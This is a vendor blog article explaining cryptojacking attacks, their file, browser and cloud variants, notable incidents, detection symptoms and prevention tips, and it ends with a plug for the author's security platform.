What is Cryptojacking Attack ❓ Definition and Prevention

Ivan Novikov
8 min readJan 19, 2022

--

Introduction

A conceivable threat to cryptocurrency owners, cryptojacking is an attack using which threat attackers can mine cryptocurrency at the expenditure of the target’s resources and network health. If not managed properly at the premature stage, the consequences of this vulnerability can be too detrimental.

If you are not aware of this threat’s existence, let us guide you thoroughly on this. In this article, we will cover what is cryptojacking attacks, what are general methods that attackers use, and a few real-word examples to make you aware about the severely of the matter.

Cryptojacking definition

Crpytojacking is a type of cyber-attack and is the process of ill-intended cryptomining. The menace works by embedding a befouled code into the targeted device and eradicating its resources to mine unauthorized cryptocurrency.

Cryptocurrency mining implicates solving tricky arithmetic equations, which is a tedious and resource-consuming task. At times, adequate resources are not available for the hackers. Hence, they plan a cryptojacking attack, gain access to targets’ devices and networks, and use them to unravel presented problems.

Upon success solving the given equations, hackers are endowed with cryptocurrencies that can be used to trade virtually, buy other cryptocurrencies, or get exchanged with traditional money. The rise of cryptocurrency provoked a surge in cryptojacking.

Depending upon the intention of the hacker, the cryptocurrency attained via a cryptojacking attack can either be used for trading or left in the liquidity pool. For a deeper understanding of the cryptojacking concept, knowing two terms, cryptocurrency and cryptomining are crucial.

  • Cryptocurrency Definition

Invented accidentally in 2009, cryptocurrency is a well-encrypted digital currency having the facility for end-to-end transaction tracking. The use of Blockchain technology, wherein multiple computer programs and processing powers are merged, is making cryptocurrency trading and invention conceivable.

The first-ever created cryptocurrency is Bitcoin and it is one of the most high-valued cryptocurrencies. As of now, more than 2,500 cryptocurrency exist. Some other utterly renowned cryptocurrencies are Zcash, Ethereum, and Monero.

  • Cryptomining Definition

Crytomining refers to the computing process that makes cryptocurrency exchange possible. It usually concerns adding cryptocurrency transactions to the Blockchain ledger and revising the information.

Cryptominer is what we call the professionals handling this job. They are likely to be skilled enough to use powerful servers and high-end hardware.

Future of Cryptojacking

As long as cryptocurrency will have huge market demand, cryptojacking will be trending as it allows the threat actor to mine cryptocurrency without even owning the needed resources. It keeps the attack free from the tension to pay for heft hardware and build a powerful network system.

Cryptojacking relies fully upon the the growth of cryptocurrency industry. However, the latter faces the wrath due to this undesired connection. 2 most concerning factors due to this trend are:

  • Strict law enforcement that makes things tougher for the crypto world
  • Ban of Coinhive

These two factors have caused little damp in cryptojacking. Let us tell you how:

Even though cryptocurrency has come a long way, there still exist countries in a good number that do not support cryptocurrency usage. Even if it’s legal in certain regions, many restrictions drive its usage. This is a major reason and inhibition behind the limited acceptance of this digital currencies among people.

Coinhive is the largest site for cryptominers. But, the site was shut down in 2019 as its code was badly abused and become a target of a hacker. The event caused limited accessibility of cryptocurrency for a while.

How it Works?

Performed in multiple stages, cryptojacking is a skilled job. The key steps involved in a successful cryptojacking attack are:

  • The attacker integrated the script for mining in a webpage or an email
  • The code is auto-installed as soon as the target clicks on the malicious code.
  • The script program runs in the background stealthily, controlling the targeted device.
  • The desired resources are consumed as per the need of the attacker.
  • Attackers start mining using the targeted devices’ resources.
  • As the primary step of cryptomining, hackers start cracking the complicated algorithms.
  • Once the algorithm is solved, the hacker can earn the cryptocurrency.

The entire procedure is about controlling a certain part of the device. This seems very much similar to a ransomware attack. The only difference is the visibility of the attack. While a ransomware is clearly visible, cryptojacking assaults remain hidden and work from behind the screen.

This concealing nature of the attack makes it more difficult to identify and fix it in the early stage.

Cryptojacking Methods

Cryptojacking assaults seize its victim using mainly three methods: file-based, browser-based, and cloud cryptojacking. Each method has a different modus-operandi and a different course of action that can be understood by paying attention to the below-mentioned text.

  • File-Based Cryptojacking

It involves downloading and executing a corrupted file. The file features an infected script that spreads its impact throughout the targeted system’s IT ecosystem upon successful downloading. Mostly, emails are used to spread such files or links that are malicious in nature.

Targets are lured to download or open the file. As soon as this step is done, the script becomes active and starts mining. It works stealthily without letting the target know about its presence.

  • Browser-Based Cryptojacking

It is more of a direct and aggressive attack that impacts the IT ecosystem of the targeted device straightforwardly from the browser.

It begins with generating a maliciously programmed script. Once the code is generated correctly by the malicious actor, it’s embedded directly in multiple web pages of separate sites. The script is 100% automatic and doesn’t require any manual handling.

As soon as the target visits the infected URL, his device auto-downloads the inserted code and supports hackers in cryptojacking unintentionally.

Ads through third-parties and the outdated (or less secure) plugins are the general components that malicious actors use for hiding their scripts in general. Sometime, these attacks act even smartly and embed their malicious code in a JavaScript library. With this, it becomes easier to operate a bigger supply chain attack on the target(s).

  • Cloud Cryptojacking

This method is favorite of intruders trying to access your essential resources at a large scale. Using cloud cryptojacking technique, they try accessing the APIs your organization use for accessing organization’s cloud platform and related services.

Thereafter, hackers are able to consume the CPU resources without any limitations. This leads to unwanted and excess resource consumption and operational cost for the organization. FYI, this method enables the user to mine at a big level and faster — without much hassles and efforts.

Real examples of cryptojacking

Though not affected many till the date, cryptojacking is a real trouble that affects businesses. It has caused damages beyond one’s understanding. Some of the world’s most notorious cryptojacking attacks are as followed:

  1. Microsoft

In 2019, the prestigious Microsoft store spotted 8 apps involved in cryptomining activities. The problematic part was, resources that were being used in the process were the ones of the users who’ve installed and used the app.

Though the apps were removed, a lot of damage was done. Spectacultions were made that though those apps came thorugh separare developers, just one person or organization strategically planned this attack and executed it.

The infected apps featured corrupted JavaScript codes and were instructed to mine Monero. As a huge amount of resources was consumed for the job, the targeted devices used to encounter ill-effects like slowed-down performance and reduced

2. A European Department

In 2018 itself, there was another victim of cryptojacking. It was the central water control system of Europe. Here also, the cryptomining code was instructed to mine Monero.

Threat actors infected the key operating system of the entire water utility network. Technically, it was the very 1st attack of its kind that targeted the industrial landscape for cryptojacking.

3. Los Angeles Times

One of the leading media houses, Los Angeles Times, has been victimized by cryptojacking. The incident happened in 2018 and targeted the report page. Anyone who accessed this page on their mobile or other data-driven device was infected. Unfortunately, this cryptojacking code remained unidentified for a longer time and allowed hackers to mine Monero.

4. YouTube

Some of the CoinHive miners were spotted active in multiple YouTube ads.

Detecting cryptojacking. Quick test

If you want to figure out how to stop cryptojacking, it is essential that you learn to discover it first.

A strategically planned cryptojacking attack is potent enough to remain hidden and exhaust the resources extensively. At times, attackers plant the code so dexterously the targets remain unaware of its presence. However, a little bit of diligence and awareness plays a huge role in its early detection.

The below-mentioned cryptojacking test methods can be of great help in this regard:

  • Poor performance delivery

As quoted above, the successful execution of malicious cryptomining code consumes the targeted device’s resources. So, a significant symptom in your device is the a sudden or gradual dip in its productivity. Its performance chart takes a downslope.

This unwanted consumption increases the burden on the device and makes it slow. So, it’s obvious to experience slow processing, unexpected shutdown, and failures in opening certain apps or programs. At times, the targeted device may even refuse to open or start as it’s supposed to be.

  • Excessive heating

The extra resource consumption leads to overburden on the OS of the targeted device and makes it overheat.

When it continues for a longer period, the average lifespan of the device decreases. However, this is not the obvious sign of a cryptojacking attack as overheating is the outcome of multiple reasons. Hence, one has to delve deeper and look at other obvious cryptojacking related behaviors.

  • Inspect the CPU usage

CPU’s health of the targeted devices will surely deteriorate when it will perform heavy tasks like mining. This is why one must check the CPU health regularly. If one witnesses too much CPU usage while visiting a website having no rich media data on it, a suspicious code snippet could be lying in it background.

While doing it on personal computers, one must go to Task Manager (or any equivalent tool) and lookout the mention of excess CPU usages. In an enterprise ecosystem, there should be a dedicated IT team for this task.

  • Keeping an eye on the website

Threat actors remain highly vigilant and hunt for a website that is vulnerable and offers multiple opportunities to embed a code. Make sure that the website is not featuring any outdated plugin or add-on.

Also, if you own a website, it’s crucial to inspect it regularly so that any corrupted code can be spotted in the early stage. The earlier is the detection, the lesser is the damage.

Cryptojacking Prevention Tips and Tricks

Cryptojacking is an issue for business because, if not addressed or fixed properly, these attacks can cause damage beyond one’s imagination. However, its dangers can be under-control by diligently following the below-mentioned tips:

  • Use cybersecurity tools that could speedily detect malicious code in your system;
  • Web browsers are the first choice of threat attackers. This is why protecting it is the first defense action. There are a few trustworthy add-ons (e.g., No Coin, AntiMiner, and minerBlock) you may bank upon for this.
  • Be aware of current cryptojacking trends to figure out what all the attackers are capable of currently;
  • Blocking ads from untrusted sources, one can reduce the risks of cryptojacking. For this, you can spend some time and find a reliable ad blocker for your use.
  • Disable JavaScript while visiting a suspicious site or disable auto-downloading in your browser.
  • Use Walarm API Security Platform, also read the important post about API security

Originally published at https://www.wallarm.com.

--

--

Ivan Novikov
Ivan Novikov

Written by Ivan Novikov

CEO at Wallarm. Application security platform to prevent threats and discover vulnerabilities in a real-time.